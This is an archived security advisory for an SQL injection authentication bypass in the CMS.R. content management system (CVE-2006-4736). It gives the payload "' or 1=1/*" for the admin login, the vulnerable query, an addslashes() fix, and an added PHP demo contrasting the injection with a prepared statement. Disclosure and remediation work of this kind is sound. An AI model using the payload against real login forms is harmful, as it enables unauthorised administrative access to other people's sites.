Bug: CMS.R. the Content Management System admin authentication bypass


Published: 2006.09.18
Credit: HACKERS PAL
Risk: Medium
CWE: CWE-89
CVE: CVE-2006-4736
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hello

Title : CMS.R. the Content Management System admin authentication bypass

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net

The vulnerability is fully exploitable when magic_quotes_gpc = off, because nothing then escapes the quote characters in the submitted form values.

Submit the following as the admin user name value:

[code]
' or 1=1/*
[/code]

and you will be logged in: the quote closes the username literal, "or 1=1" makes the WHERE clause true for every row, and "/*" comments out the password check.

Vulnerable file : index.php

Line : 48

Query :

[code]
// Vulnerable: the raw POST values are concatenated straight into the SQL string.
$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY
username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";
[/code]

Solution :

Replace

[code]
$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY
username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";
[/code]

with

[code]
//
// Fixed By : HACKERS PAL
// WwW.SoQoR.NeT
//
$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY
username='".addslashes($_POST['adminname'])."' AND BINARY
pass='".addslashes($_POST['adminpass'])."'";
[/code]
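An added example, not code from the advisory or from CMS.R.: it rebuilds the index.php query against an in-memory SQLite database through PDO, runs it with the user name value quoted above, and contrasts it with a prepared statement, which binds the input as data and so does not depend on addslashes() or magic_quotes_gpc. The table name cms_user, its columns and the admin row are constructed for the demo, and MySQL's BINARY operator is omitted.

```php
<?php
// Added example, not code from the CMS.R. advisory: the index.php query is
// rebuilt against an in-memory SQLite database via PDO so it runs offline.
// Table name, columns and the admin row are constructed; MySQL's BINARY
// operator is dropped (SQLite already compares TEXT byte for byte).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE cms_user (username TEXT NOT NULL, pass TEXT NOT NULL)");
$db->exec("INSERT INTO cms_user VALUES ('admin', 's3cret-example')");

// What index.php line 48 does: raw POST values spliced into the SQL string.
// With magic_quotes_gpc = off nothing escapes the quote in the user name.
function vulnerableLogin(PDO $db, string $adminname, string $adminpass): ?array
{
    $query = "SELECT * FROM cms_user WHERE username='" . $adminname
           . "' AND pass='" . $adminpass . "'";
    $row = $db->query($query)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form: a prepared statement binds both values as data, so quotes,
// comment markers and operators in the input can never alter the query.
// This also removes the dependency on addslashes() / magic_quotes_gpc.
function safeLogin(PDO $db, string $adminname, string $adminpass): ?array
{
    $stmt = $db->prepare("SELECT * FROM cms_user WHERE username = ? AND pass = ?");
    $stmt->execute([$adminname, $adminpass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$payload = "' or 1=1/*";  // the user name value given in the advisory

// The WHERE clause becomes  username='' or 1=1/*' AND pass='...'  : the comment
// swallows the password check and 1=1 matches the first row, i.e. admin.
$bypass = vulnerableLogin($db, $payload, 'wrong-password');
echo "vulnerable query: ", $bypass ? "logged in as {$bypass['username']}" : "rejected", "\n";

// The same input bound as a parameter matches no user.
$blocked = safeLogin($db, $payload, 'wrong-password');
echo "prepared statement: ", $blocked ? "logged in" : "rejected", "\n";

// Legitimate credentials still work through the prepared statement.
$ok = safeLogin($db, 'admin', 's3cret-example');
echo "valid credentials: ", $ok ? "logged in as {$ok['username']}" : "rejected", "\n";
```

Requires PHP with the pdo_sqlite extension; the password column is compared in the clear only to mirror the original query, a real login should compare a password hash.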

WwW.SoQoR.NeT

Copyright 2014, cxsecurity.com